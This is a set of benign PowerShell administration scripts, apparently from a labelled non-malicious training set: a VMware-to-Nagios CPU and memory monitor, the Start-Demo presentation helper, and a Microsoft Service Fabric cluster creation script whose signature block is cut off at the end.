#region vars $statvalues=("mem.usage.average", "cpu.usage.average") $nsca_stat = "" [int]$warnlevel = 85 [int]$criticallevel = 90 $status = "" $nagsrv = "nagios-srv.local" #endregion $vms = Get-VM | Where-Object { $_.PowerState -eq "PoweredOn" } | sort-object foreach ($vm in $vms) { $statvalues | foreach { [int]$statavg = ($vm | Get-Stat -Stat $_ -Start ((get-date).AddMinutes(-5)) -MaxSamples 500 | Measure-Object -Property Value -Average).Average $vmdns = ($vm | Get-VMGuest).Hostname switch ($_) { "mem.usage.average" { $nsca_stat = "mem_vm"; $desc = "Memory Usage" } "cpu.usage.average" { $nsca_stat = "cpu_vm"; $desc = "CPU Usage" } } if ($statavg -gt $criticallevel) { $status = "2" $desc = "CRITICAL: " + $desc } elseif ($statavg -gt $warnlevel) { $status = "1" $desc = "WARNING: " + $desc } elseif ($statavg -lt $warnlevel) { $status = "0" } $nsca = "${vmdns};${nsca_stat};${status};${desc} ${statavg}% | ${nsca_stat}=${statavg};$warnlevel;$criticallevel;0;100" Write-Host $nsca if ($vmdns) { echo $nsca | ./send_nsca.exe -H $nagsrv -c send_nsca.cfg -d ";" } } }
combined_dataset/train/non-malicious/Start-Demo 3.3.1.ps1
Start-Demo 3.3.1.ps1
## Start-Demo.ps1 ################################################################################################## ## This is an overhaul of Jeffrey Snover's original Start-Demo script by Joel "Jaykul" Bennett ## ## I've switched it to using ReadKey instead of ReadLine (you don't have to hit Enter each time) ## As a result, I've changed the names and keys for a lot of the operations, so that they make ## sense with only a single letter to tell them apart (sorry if you had them memorized). ## ## I've also been adding features as I come across needs for them, and you'll contribute your ## improvements back to the PowerShell Script repository as well. ################################################################################################## ## Revision History (version 3.3) ## 3.3.1 Added: Fixed a bracket in the script ## 3.3 - Added: Added a "Clear Screen" option ## - Added: Added a "Rewind" function (which I'm not using much) ## 3.2 - Fixed: Put back the trap { continue; } ## 3.1 - Fixed: No Output when invoking Get-Member (and other cmdlets like it???) ## 3.0 - Fixed: Commands which set a variable, like: $files = ls ## - Fixed: Default action doesn't continue ## - Changed: Use ReadKey instead of ReadLine ## - Changed: Modified the option prompts (sorry if you had them memorized) ## - Changed: Various time and duration strings have better formatting ## - Enhance: Colors are settable: prompt, command, comment ## - Added: NoPauseAfterExecute switch removes the extra pause ## If you set this, the next command will be displayed immediately ## - Added: Auto Execute mode (FullAuto switch) runs the rest of the script ## at an automatic speed set by the AutoSpeed parameter (or manually) ## - Added: Automatically append an empty line to the end of the demo script ## so you have a chance to "go back" after the last line of you demo ################################################################################################## ## param( $file=".\\demo.txt", [int]$command=0, [System.ConsoleColor]$promptColor="Yellow", [System.ConsoleColor]$commandColor="White", [System.ConsoleColor]$commentColor="Green", [switch]$FullAuto, [int]$AutoSpeed = 3, [switch]$NoPauseAfterExecute ) $RawUI = $Host.UI.RawUI $hostWidth = $RawUI.BufferSize.Width # A function for reading in a character function Read-Char() { $_OldColor = $RawUI.ForeGroundColor $RawUI.ForeGroundColor = "Red" $inChar=$RawUI.ReadKey("IncludeKeyUp") # loop until they press a character, so Shift or Ctrl, etc don't terminate us while($_input.Character -eq 0){ $inChar=$RawUI.ReadKey("IncludeKeyUp") } $RawUI.ForeGroundColor = $_OldColor return $inChar.Character } function Rewind($lines, $index, $steps = 1) { $started = $index; $index -= $steps; while(($index -ge 0) -and ($lines[$index].Trim(" `t").StartsWith("#"))){ $index-- } if( $index -lt 0 ) { $index = $started } return $index } $file = Resolve-Path $file while(-not(Test-Path $file)) { $file = Read-Host "Please enter the path of your demo script (Crtl+C to cancel)" $file = Resolve-Path $file } Clear-Host $_lines = Get-Content $file # Append an extra (do nothing) line on the end so we can still go back after the last line. $_lines += "Write-Host 'The End'" $_starttime = [DateTime]::now $FullAuto = $false Write-Host -nonew -back black -fore $promptColor $(" " * $hostWidth) Write-Host -nonew -back black -fore $promptColor @" <Demo Started :: $(split-path $file -leaf)>$(' ' * ($hostWidth -(18 + $(split-path $file -leaf).Length))) "@ Write-Host -nonew -back black -fore $promptColor "Press" Write-Host -nonew -back black -fore Red " ? " Write-Host -nonew -back black -fore $promptColor "for help.$(' ' * ($hostWidth -17))" Write-Host -nonew -back black -fore $promptColor $(" " * $hostWidth) # We use a FOR and an INDEX ($_i) instead of a FOREACH because # it is possible to start at a different location and/or jump # around in the order. for ($_i = $Command; $_i -lt $_lines.count; $_i++) { # Put the current command in the Window Title along with the demo duration $Dur = [DateTime]::Now - $_StartTime $RawUI.WindowTitle = "$(if($dur.Hours -gt 0){'{0}h '})$(if($dur.Minutes -gt 0){'{1}m '}){2}s {3}" -f $dur.Hours, $dur.Minutes, $dur.Seconds, $($_Lines[$_i]) # Echo out the commmand to the console with a prompt as though it were real Write-Host -nonew -fore $promptColor "[$_i]PS> " if ($_lines[$_i].Trim(" ").StartsWith("#")) { Write-Host -fore $commentColor "$($_Lines[$_i]) " continue } else { Write-Host -nonew -fore $commandColor "$($_Lines[$_i]) " } if( $FullAuto ) { Start-Sleep $autoSpeed; $ch = [char]13 } else { $ch = Read-Char } switch($ch) { "?" { Write-Host -Fore $promptColor @" Running demo: $file (n) Next (p) Previous (q) Quit (s) Suspend (t) Timecheck (v) View $(split-path $file -leaf) (g) Go to line by number (f) Find lines by string (a) Auto Execute mode (c) Clear Screen "@ $_i-- # back a line, we're gonna step forward when we loop } "n" { # Next (do nothing) Write-Host -Fore $promptColor "<Skipping Line>" } "p" { # Previous Write-Host -Fore $promptColor "<Back one Line>" while ($_lines[--$_i].Trim(" ").StartsWith("#")){} $_i-- # back a line, we're gonna step forward when we loop } "x" { # EXECUTE (Go Faster) $AutoSpeed = [int](Read-Host "Pause (seconds)") $FullAuto = $true; Write-Host -Fore $promptColor "<eXecute Remaining Lines>" $_i-- # Repeat this line, and then just blow through the rest } "q" { # Quit Write-Host -Fore $promptColor "<Quiting demo>" $_i = $_lines.count; break; } "v" { # View Source $lines[0..($_i-1)] | Write-Host -Fore Yellow $lines[$_i] | Write-Host -Fore Green $lines[($_i+1)..$lines.Count] | Write-Host -Fore Yellow $_i-- # back a line, we're gonna step forward when we loop } "t" { # Time Check $dur = [DateTime]::Now - $_StartTime Write-Host -Fore $promptColor $( "{3} -- $(if($dur.Hours -gt 0){'{0}h '})$(if($dur.Minutes -gt 0){'{1}m '}){2}s" -f $dur.Hours, $dur.Minutes, $dur.Seconds, ([DateTime]::Now.ToShortTimeString())) $_i-- # back a line, we're gonna step forward when we loop } "s" { # Suspend (Enter Nested Prompt) Write-Host -Fore $promptColor "<Suspending demo - type 'Exit' to resume>" $Host.EnterNestedPrompt() $_i-- # back a line, we're gonna step forward when we loop } "g" { # GoTo Line Number $i = [int](Read-Host "line number") if($i -le $_lines.Count) { if($i -gt 0) { # extra line back because we're gonna step forward when we loop $_i = Rewind $_lines $_i (($_i-$i)+1) } else { $_i = -1 # Start negative, because we step forward when we loop } } } "f" { # Find by pattern $match = $_lines | Select-String (Read-Host "search string") if($match -eq $null) { Write-Host -Fore Red "Can't find a matching line" } else { $match | % { Write-Host -Fore $promptColor $("[{0,2}] {1}" -f ($_.LineNumber - 1), $_.Line) } if($match.Count -lt 1) { $_i = $match.lineNumber - 2 # back a line, we're gonna step forward when we loop } else { $_i-- # back a line, we're gonna step forward when we loop } } } "c" { Clear-Host $_i-- # back a line, we're gonna step forward when we loop } "$([char]13)" { # on enter Write-Host trap [System.Exception] {Write-Error $_; continue;} Invoke-Expression ($_lines[$_i]) | out-default if(-not $NoPauseAfterExecute -and -not $FullAuto) { $null = $RawUI.ReadKey("NoEcho,IncludeKeyUp") # Pause after output for no apparent reason... ;) } } default { Write-Host -Fore Green "`nKey not recognized. Press ? for help, or ENTER to execute the command." $_i-- # back a line, we're gonna step forward when we loop } } } $dur = [DateTime]::Now - $_StartTime Write-Host -Fore $promptColor $( "<Demo Complete -- $(if($dur.Hours -gt 0){'{0}h '})$(if($dur.Minutes -gt 0){'{1}m '}){2}s>" -f $dur.Hours, $dur.Minutes, $dur.Seconds, [DateTime]::Now.ToLongTimeString()) Write-Host -Fore $promptColor $([DateTime]::now) Write-Host
combined_dataset/train/non-malicious/sample_67_10.ps1
sample_67_10.ps1
# ------------------------------------------------------------ # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License (MIT). See License.txt in the repo root for license information. # ------------------------------------------------------------ param ( [Parameter(Mandatory=$true)] [string] $ClusterConfigFilePath, [Parameter(Mandatory=$false)] [switch] $AcceptEULA, [Parameter(Mandatory=$false)] [switch] $Force, [Parameter(Mandatory=$false)] [switch] $NoCleanupOnFailure, [Parameter(Mandatory=$false)] [switch] $FabricIsPreInstalled, [Parameter(Mandatory=$false)] [string] $FabricRuntimePackagePath, [Parameter(Mandatory=$false)] [switch] $GenerateX509Cert, [Parameter(Mandatory=$false)] [string] $GeneratedX509CertClusterConfigPath = $null, [Parameter(Mandatory=$false)] [int] $MaxPercentFailedNodes, [Parameter(Mandatory=$false)] [int] $TimeoutInSeconds ) function DeletePath([string] $pathToDelete) { if (([string]::IsNullOrEmpty($pathToDelete)) -or (!(Test-Path $pathToDelete))) { return; } Write-Host "Deleting $pathToDelete" Remove-Item $pathToDelete -Recurse -Force 2> $null if (Test-Path $pathToDelete) { Write-Warning "$pathToDelete still exists. Delete manually." } } $Identity = [System.Security.Principal.WindowsIdentity]::GetCurrent() $Principal = New-Object System.Security.Principal.WindowsPrincipal($Identity) $IsAdmin = $Principal.IsInRole([System.Security.Principal.WindowsBuiltInRole]::Administrator) if(!$IsAdmin) { Write-host "Please run the script with administrative privileges." -ForegroundColor "Red" exit 1 } if(!$AcceptEULA.IsPresent) { $EulaAccepted = Read-Host 'Do you accept the license terms for using Microsoft Azure Service Fabric located in the root of your package download? If you do not accept the license terms you may not use the software. [Y] Yes [N] No [?] Help (default is "N")' if($EulaAccepted -ne "y" -and $EulaAccepted -ne "Y") { Write-host "You need to accept the license terms for using Microsoft Azure Service Fabric located in the root of your package download before you can use the software." -ForegroundColor "Red" exit 1 } } $ThisScriptPath = $(Split-Path -parent $MyInvocation.MyCommand.Definition) $DeployerBinPath = Join-Path $ThisScriptPath -ChildPath "DeploymentComponents" $SystemFabricModulePath = Join-Path $DeployerBinPath -ChildPath "System.Fabric.dll" if(!(Test-Path $SystemFabricModulePath) -and (Test-Path $DeployerBinPath)) { Write-Host "Cleaning old partially extracted DeploymentComponents at $DeployerBinPath." DeletePath($DeployerBinPath) } if(!(Test-Path $DeployerBinPath)) { $DCAutoExtractorPath = Join-Path $ThisScriptPath "DeploymentComponentsAutoextractor.exe" if(!(Test-Path $DCAutoExtractorPath)) { Write-Host "Standalone package DeploymentComponents and DeploymentComponentsAutoextractor.exe are not present local to the script location." exit 1 } #Extract DeploymentComponents $DCAutoExtractorCommand = "`"$DCAutoExtractorPath`" /E /Y /L `"$ThisScriptPath`"" # special case for older powershell versions < 5 if ($PSVersionTable.PSVersion.Major -lt 5) { $DCAutoExtractorCommand = "`"`"$DCAutoExtractorPath`" /E /Y /L `"$ThisScriptPath`"`"" } Write-Host "running autoextractor command: $DCAutoExtractorCommand" $DCExtractOutput = cmd.exe /c "$DCAutoExtractorCommand && exit 0 || exit 1" if($LASTEXITCODE -eq 1) { Write-Host "Extracting DeploymentComponents Cab ran into an issue." Write-Host $DCExtractOutput exit 1 } else { Write-Host "DeploymentComponents extracted." } } if(!(Test-Path $SystemFabricModulePath)) { Write-Host "Missing expected file $SystemFabricModulePath." exit 1 } $MicrosoftServiceFabricCabFileAbsolutePath = $null if($FabricRuntimePackagePath) { $MicrosoftServiceFabricCabFileAbsolutePath = Resolve-Path $FabricRuntimePackagePath if(!(Test-Path $MicrosoftServiceFabricCabFileAbsolutePath)) { Write-Host "Microsoft Service Fabric Runtime package not found in the specified directory : $FabricRuntimePackagePath" exit 1 } } else { $RuntimeBinPath = Join-Path $ThisScriptPath -ChildPath "DeploymentRuntimePackages" if(!(Test-Path $RuntimeBinPath)) { Write-Host "No directory exists for Runtime packages. Creating a new directory." md $RuntimeBinPath | Out-Null Write-Host "Done creating $RuntimeBinPath" } } $ClusterConfigFilePath = Resolve-Path $ClusterConfigFilePath $ServiceFabricPowershellModulePath = Join-Path $DeployerBinPath -ChildPath "ServiceFabric.psd1" $CertUtilityModulePath = Join-Path -Path $ThisScriptPath -ChildPath "CertInstallUtilities.psm1" $CertSetupScript = Join-Path $ThisScriptPath -ChildPath "CertSetup.ps1" # Create Self-Signed Cert if necessary if ($GenerateX509Cert.IsPresent) { Import-Module $CertUtilityModulePath if (IsSecurityX509 -ClusterConfigFilePath $ClusterConfigFilePath) { Write-Warning "GenerateX509Cert is enabled and ClusterCredentialType is X509. ` The certificateinformation section configured on the $ClusterConfigFilePath will be igonred.` Instead, the script will generate self-signed certificates and modify json config.` Please don't apply the same settings in Production Environment." # Install Server Cert and Client Cert locally and export. $thumbprintArray = InstallCertToLocal -CertSetupScript $CertSetupScript $serverThumbprint = $thumbprintArray[0] $clientThumbprint = $thumbprintArray[1] $packageRoot = (Get-Item $DeployerBinPath).parent.FullName $serverCertificate = ExportCertificateToLocal -PackageRoot $packageRoot -CertSetupScript $CertSetupScript -ServerThumbprint $ServerThumbprint -ClientThumbprint $clientThumbprint -ClusterConfigFilePath $ClusterConfigFilePath # Install Cert Remotely if (-Not (IsOneBox -ClusterConfigFilePath $ClusterConfigFilePath)) { InstallCertToRemote -ClusterConfigFilePath $ClusterConfigFilePath -CertificatePath $serverCertificate[0] -Password $serverCertificate[1] } # Modify Json if (!(Test-Path variable:GeneratedX509CertClusterConfigPath) ` -or [string]::IsNullOrEmpty($GeneratedX509CertClusterConfigPath)) { $OutputConfigFolder = Join-Path $packageRoot "TemporaryConfig" if (-Not(Test-Path $OutputConfigFolder)) { try { New-Item -ItemType Directory -Force -Path $OutputConfigFolder -ErrorAction Stop | Out-Null } catch { Write-Error "Unable to create generated configuration directory $OutputConfigFolder. Error: $_" exit 1 } } $GeneratedX509CertClusterConfigPath = Join-Path $OutputConfigFolder "GeneratedX509CertClusterConfig.json" } ModifyJsonThumbprint -ClusterConfigFilePath $ClusterConfigFilePath -ServerThumbprint $serverThumbprint -ClientThumbprint $clientThumbprint -OutPutPath $GeneratedX509CertClusterConfigPath $ClusterConfigFilePath = $GeneratedX509CertClusterConfigPath Write-Warning "Using generated $ClusterConfigFilePath to setup cluster. Please use it when removing cluster." } else { Write-Warning 'Self-Signed certificates are not generated because X509 is not properly configured.' } } $parentVerbosePreference = $VerbosePreference # Invoke in separate AppDomain $argList = @($DeployerBinPath, $ServiceFabricPowershellModulePath, $ClusterConfigFilePath, $Force.IsPresent, $NoCleanupOnFailure.IsPresent, $FabricIsPreInstalled.IsPresent, $MicrosoftServiceFabricCabFileAbsolutePath, $MaxPercentFailedNodes, $TimeoutInSeconds, $parentVerbosePreference) Powershell -Command { param ( [Parameter(Mandatory=$true)] [string] $DeployerBinPath, [Parameter(Mandatory=$true)] [string] $ServiceFabricPowershellModulePath, [Parameter(Mandatory=$true)] [string] $ClusterConfigFilePath, [Parameter(Mandatory=$false)] [bool] $Force, [Parameter(Mandatory=$false)] [bool] $NoCleanupOnFailure, [Parameter(Mandatory=$false)] [bool] $FabricIsPreInstalled, [Parameter(Mandatory=$false)] [string] $MicrosoftServiceFabricCabFileAbsolutePath, [Parameter(Mandatory=$false)] [int] $MaxPercentFailedNodes, [Parameter(Mandatory=$false)] [int] $TimeoutInSeconds, [Parameter(Mandatory=$false)] [string] $ParentVerbosePreference ) #Add FabricCodePath Environment Path $env:path = "$($DeployerBinPath);" + $env:path #Import Service Fabric Powershell Module Import-Module $ServiceFabricPowershellModulePath if (!(Test-Path variable:MicrosoftServiceFabricCabFileAbsolutePath) ` -or [string]::IsNullOrEmpty($MicrosoftServiceFabricCabFileAbsolutePath)) { #Download Runtime Package Try { $RuntimePackageDetails = Get-ServiceFabricRuntimeSupportedVersion -Latest $RuntimeCabFilename = "MicrosoftAzureServiceFabric." + $RuntimePackageDetails.GoalRuntimeVersion + ".cab" $DeploymentPackageRoot = Split-Path -parent $DeployerBinPath $RuntimeBinPath = Join-Path $DeploymentPackageRoot -ChildPath "DeploymentRuntimePackages" $MicrosoftServiceFabricCabFilePath = Join-Path $RuntimeBinPath -ChildPath $RuntimeCabFilename if(!(Test-Path $MicrosoftServiceFabricCabFilePath)) { $Version = $RuntimePackageDetails.GoalRuntimeVersion Write-Host "Runtime package version $Version was not found in DeploymentRuntimePackages folder and needed to be downloaded." (New-Object System.Net.WebClient).DownloadFile($RuntimePackageDetails.GoalRuntimeLocation, $MicrosoftServiceFabricCabFilePath) Write-Host "Runtime package has been successfully downloaded to $MicrosoftServiceFabricCabFilePath." } $MicrosoftServiceFabricCabFileAbsolutePath = Resolve-Path $MicrosoftServiceFabricCabFilePath } Catch { Write-Host "Runtime package cannot be downloaded. Check your internet connectivity. If the cluster is not connected to the internet, use another machine with internet connectivity to download the runtime package. Run DownloadServiceFabricRuntimePackage.ps1 -FabricRuntimePackageOutputDirectory <Path to directory where runtime package should be saved> to download the latest package. Then run CreateServiceFabricCluster.ps1 -ClusterConfigurationFilePath <ClusterConfigFilePath> -FabricRuntimePackagePath <RuntimePackagePath> to create the cluster. Exception thrown : $($_.Exception.ToString())" -ForegroundColor Red exit 1 } } #Create a cluster Try { $VerbosePreference = $ParentVerbosePreference $params = @{ 'ClusterConfigurationFilePath' = $ClusterConfigFilePath; 'FabricRuntimePackagePath' = $MicrosoftServiceFabricCabFileAbsolutePath; 'NoCleanupOnFailure' = $NoCleanupOnFailure; 'Force' = $Force; 'FabricIsPreInstalled' = $FabricIsPreInstalled; 'MaxPercentFailedNodes' = $MaxPercentFailedNodes; } if ((Test-Path variable:TimeoutInSeconds) ` -and ($TimeoutInSeconds -gt 0)) { $params += @{'TimeoutSec' = $TimeoutInSeconds;} } New-ServiceFabricCluster @params } Catch { if($VerbosePreference -eq "SilentlyContinue") { Write-Host "Create Cluster failed. Call with -Verbose for more details" -ForegroundColor Red } else { Write-Host "Create Cluster failed. Exception: $($_.Exception.ToString())" -ForegroundColor Red } exit 1 } } -args $argList -OutputFormat Text $env:Path = [System.Environment]::GetEnvironmentVariable("path","Machine") # SIG # Begin signature block # MIInwQYJKoZIhvcNAQcCoIInsjCCJ64CAQExDzANBglghkgBZQMEAgEFADB5Bgor # BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG # KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCBsidXT+/Fo7MQR # hHpDJRXdy1X5mTpDyyeISZzZaPAKQqCCDXYwggX0MIID3KADAgECAhMzAAADrzBA # DkyjTQVBAAAAAAOvMA0GCSqGSIb3DQEBCwUAMH4xCzAJBgNVBAYTAlVTMRMwEQYD # VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNpZ25p # bmcgUENBIDIwMTEwHhcNMjMxMTE2MTkwOTAwWhcNMjQxMTE0MTkwOTAwWjB0MQsw # CQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u # ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMR4wHAYDVQQDExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB # AQDOS8s1ra6f0YGtg0OhEaQa/t3Q+q1MEHhWJhqQVuO5amYXQpy8MDPNoJYk+FWA # hePP5LxwcSge5aen+f5Q6WNPd6EDxGzotvVpNi5ve0H97S3F7C/axDfKxyNh21MG # 0W8Sb0vxi/vorcLHOL9i+t2D6yvvDzLlEefUCbQV/zGCBjXGlYJcUj6RAzXyeNAN # xSpKXAGd7Fh+ocGHPPphcD9LQTOJgG7Y7aYztHqBLJiQQ4eAgZNU4ac6+8LnEGAL # go1ydC5BJEuJQjYKbNTy959HrKSu7LO3Ws0w8jw6pYdC1IMpdTkk2puTgY2PDNzB # tLM4evG7FYer3WX+8t1UMYNTAgMBAAGjggFzMIIBbzAfBgNVHSUEGDAWBgorBgEE # AYI3TAgBBggrBgEFBQcDAzAdBgNVHQ4EFgQURxxxNPIEPGSO8kqz+bgCAQWGXsEw # RQYDVR0RBD4wPKQ6MDgxHjAcBgNVBAsTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEW # MBQGA1UEBRMNMjMwMDEyKzUwMTgyNjAfBgNVHSMEGDAWgBRIbmTlUAXTgqoXNzci # tW2oynUClTBUBgNVHR8ETTBLMEmgR6BFhkNodHRwOi8vd3d3Lm1pY3Jvc29mdC5j # b20vcGtpb3BzL2NybC9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3JsMGEG # CCsGAQUFBwEBBFUwUzBRBggrBgEFBQcwAoZFaHR0cDovL3d3dy5taWNyb3NvZnQu # Y29tL3BraW9wcy9jZXJ0cy9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3J0 # MAwGA1UdEwEB/wQCMAAwDQYJKoZIhvcNAQELBQADggIBAISxFt/zR2frTFPB45Yd # mhZpB2nNJoOoi+qlgcTlnO4QwlYN1w/vYwbDy/oFJolD5r6FMJd0RGcgEM8q9TgQ # 2OC7gQEmhweVJ7yuKJlQBH7P7Pg5RiqgV3cSonJ+OM4kFHbP3gPLiyzssSQdRuPY # 1mIWoGg9i7Y4ZC8ST7WhpSyc0pns2XsUe1XsIjaUcGu7zd7gg97eCUiLRdVklPmp # XobH9CEAWakRUGNICYN2AgjhRTC4j3KJfqMkU04R6Toyh4/Toswm1uoDcGr5laYn # TfcX3u5WnJqJLhuPe8Uj9kGAOcyo0O1mNwDa+LhFEzB6CB32+wfJMumfr6degvLT # e8x55urQLeTjimBQgS49BSUkhFN7ois3cZyNpnrMca5AZaC7pLI72vuqSsSlLalG # OcZmPHZGYJqZ0BacN274OZ80Q8B11iNokns9Od348bMb5Z4fihxaBWebl8kWEi2O # PvQImOAeq3nt7UWJBzJYLAGEpfasaA3ZQgIcEXdD+uwo6ymMzDY6UamFOfYqYWXk # ntxDGu7ngD2ugKUuccYKJJRiiz+LAUcj90BVcSHRLQop9N8zoALr/1sJuwPrVAtx # HNEgSW+AKBqIxYWM4Ev32l6agSUAezLMbq5f3d8x9qzT031jMDT+sUAoCw0M5wVt # CUQcqINPuYjbS1WgJyZIiEkBMIIHejCCBWKgAwIBAgIKYQ6Q0gAAAAAAAzANBgkq # hkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24x # EDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlv # bjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlmaWNhdGUgQXV0aG9yaXR5 # IDIwMTEwHhcNMTEwNzA4MjA1OTA5WhcNMjYwNzA4MjEwOTA5WjB+MQswCQYDVQQG # EwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwG # A1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSgwJgYDVQQDEx9NaWNyb3NvZnQg # Q29kZSBTaWduaW5nIFBDQSAyMDExMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIIC # CgKCAgEAq/D6chAcLq3YbqqCEE00uvK2WCGfQhsqa+laUKq4BjgaBEm6f8MMHt03 # a8YS2AvwOMKZBrDIOdUBFDFC04kNeWSHfpRgJGyvnkmc6Whe0t+bU7IKLMOv2akr # rnoJr9eWWcpgGgXpZnboMlImEi/nqwhQz7NEt13YxC4Ddato88tt8zpcoRb0Rrrg # OGSsbmQ1eKagYw8t00CT+OPeBw3VXHmlSSnnDb6gE3e+lD3v++MrWhAfTVYoonpy # 4BI6t0le2O3tQ5GD2Xuye4Yb2T6xjF3oiU+EGvKhL1nkkDstrjNYxbc+/jLTswM9 # sbKvkjh+0p2ALPVOVpEhNSXDOW5kf1O6nA+tGSOEy/S6A4aN91/w0FK/jJSHvMAh # dCVfGCi2zCcoOCWYOUo2z3yxkq4cI6epZuxhH2rhKEmdX4jiJV3TIUs+UsS1Vz8k # A/DRelsv1SPjcF0PUUZ3s/gA4bysAoJf28AVs70b1FVL5zmhD+kjSbwYuER8ReTB # w3J64HLnJN+/RpnF78IcV9uDjexNSTCnq47f7Fufr/zdsGbiwZeBe+3W7UvnSSmn # Eyimp31ngOaKYnhfsi+E11ecXL93KCjx7W3DKI8sj0A3T8HhhUSJxAlMxdSlQy90 # lfdu+HggWCwTXWCVmj5PM4TasIgX3p5O9JawvEagbJjS4NaIjAsCAwEAAaOCAe0w # ggHpMBAGCSsGAQQBgjcVAQQDAgEAMB0GA1UdDgQWBBRIbmTlUAXTgqoXNzcitW2o # ynUClTAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTALBgNVHQ8EBAMCAYYwDwYD # VR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBRyLToCMZBDuRQFTuHqp8cx0SOJNDBa # BgNVHR8EUzBRME+gTaBLhklodHRwOi8vY3JsLm1pY3Jvc29mdC5jb20vcGtpL2Ny # bC9wcm9kdWN0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3JsMF4GCCsG # AQUFBwEBBFIwUDBOBggrBgEFBQcwAoZCaHR0cDovL3d3dy5taWNyb3NvZnQuY29t # L3BraS9jZXJ0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3J0MIGfBgNV # HSAEgZcwgZQwgZEGCSsGAQQBgjcuAzCBgzA/BggrBgEFBQcCARYzaHR0cDovL3d3 # dy5taWNyb3NvZnQuY29tL3BraW9wcy9kb2NzL3ByaW1hcnljcHMuaHRtMEAGCCsG # AQUFBwICMDQeMiAdAEwAZQBnAGEAbABfAHAAbwBsAGkAYwB5AF8AcwB0AGEAdABl # AG0AZQBuAHQALiAdMA0GCSqGSIb3DQEBCwUAA4ICAQBn8oalmOBUeRou09h0ZyKb # C5YR4WOSmUKWfdJ5DJDBZV8uLD74w3LRbYP+vj/oCso7v0epo/Np22O/IjWll11l # hJB9i0ZQVdgMknzSGksc8zxCi1LQsP1r4z4HLimb5j0bpdS1HXeUOeLpZMlEPXh6 # I/MTfaaQdION9MsmAkYqwooQu6SpBQyb7Wj6aC6VoCo/KmtYSWMfCWluWpiW5IP0 # wI/zRive/DvQvTXvbiWu5a8n7dDd8w6vmSiXmE0OPQvyCInWH8MyGOLwxS3OW560 # STkKxgrCxq2u5bLZ2xWIUUVYODJxJxp/sfQn+N4sOiBpmLJZiWhub6e3dMNABQam # ASooPoI/E01mC8CzTfXhj38cbxV9Rad25UAqZaPDXVJihsMdYzaXht/a8/jyFqGa # J+HNpZfQ7l1jQeNbB5yHPgZ3BtEGsXUfFL5hYbXw3MYbBL7fQccOKO7eZS/sl/ah # XJbYANahRr1Z85elCUtIEJmAH9AAKcWxm6U/RXceNcbSoqKfenoi+kiVH6v7RyOA # 9Z74v2u3S5fi63V4GuzqN5l5GEv/1rMjaHXmr/r8i+sLgOppO6/8MO0ETI7f33Vt # Y5E90Z1WTk+/gFcioXgRMiF670EKsT/7qMykXcGhiJtXcVZOSEXAQsmbdlsKgEhr # /Xmfwb1tbWrJUnMTDXpQzTGCGaEwghmdAgEBMIGVMH4xCzAJBgNVBAYTAlVTMRMw # EQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVN # aWNyb3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNp # Z25pbmcgUENBIDIwMTECEzMAAAOvMEAOTKNNBUEAAAAAA68wDQYJYIZIAWUDBAIB # BQCgga4wGQYJKoZIhvcNAQkDMQwGCisGAQQBgjcCAQQwHAYKKwYBBAGCNwIBCzEO # MAwGCisGAQQBgjcCARUwLwYJKoZIhvcNAQkEMSIEIFKxbeZatomVty3HNo77hMrh # nO52RPVNMQp4qDJCSEicMEIGCisGAQQBgjcCAQwxNDAyoBSAEgBNAGkAYwByAG8A # cwBvAGYAdKEagBhodHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20wDQYJKoZIhvcNAQEB # BQAEggEASjor+wkAif+OVqlcYOAZ7srvVKe99QEfOqRQhmSqvbvxjHwZ6rHxu+WE # 5ZYUGDuQWvdQxd57VmxfXhBqSjVUM/BEKeLIl9Cy5hW/y1xw9yysu0/eiS1ZxEWq # 20/8MTRiJ9EZPnF25k7hqqWYXQp2H6B+Vvxg1KHATpCi3jAxEXkmySFlYM3tQb0Y # PBLNVusYvwU5Fy/gz46Blf88hz06GA+PbJFlxFI7n1f1MltezuIjy+eheQGr2K7R # 7AIpcLqf7VNbn63TyzxQJbLh9Mx9eOmHqnZ35qcpEspjpBvxLsRsIO7n8GiTPtxe # cZrOsJQldWtWca4pWKj+mR3JvcL26aGCFyswghcnBgorBgEEAYI3AwMBMYIXFzCC # FxMGCSqGSIb3DQEHAqCCFwQwghcAAgEDMQ8wDQYJYIZIAWUDBAIBBQAwggFZBgsq # hkiG9w0BCRABBKCCAUgEggFEMIIBQAIBAQYKKwYBBAGEWQoDATAxMA0GCWCGSAFl # AwQCAQUABCBrQCkRCznIeZXhxoi1Rq2lc54qx/orsXiKllG++SubrQIGZk30ugg7 # GBMyMDI0MDUyMjIzMDg0MC4xODJaMASAAgH0oIHYpIHVMIHSMQswCQYDVQQGEwJV # 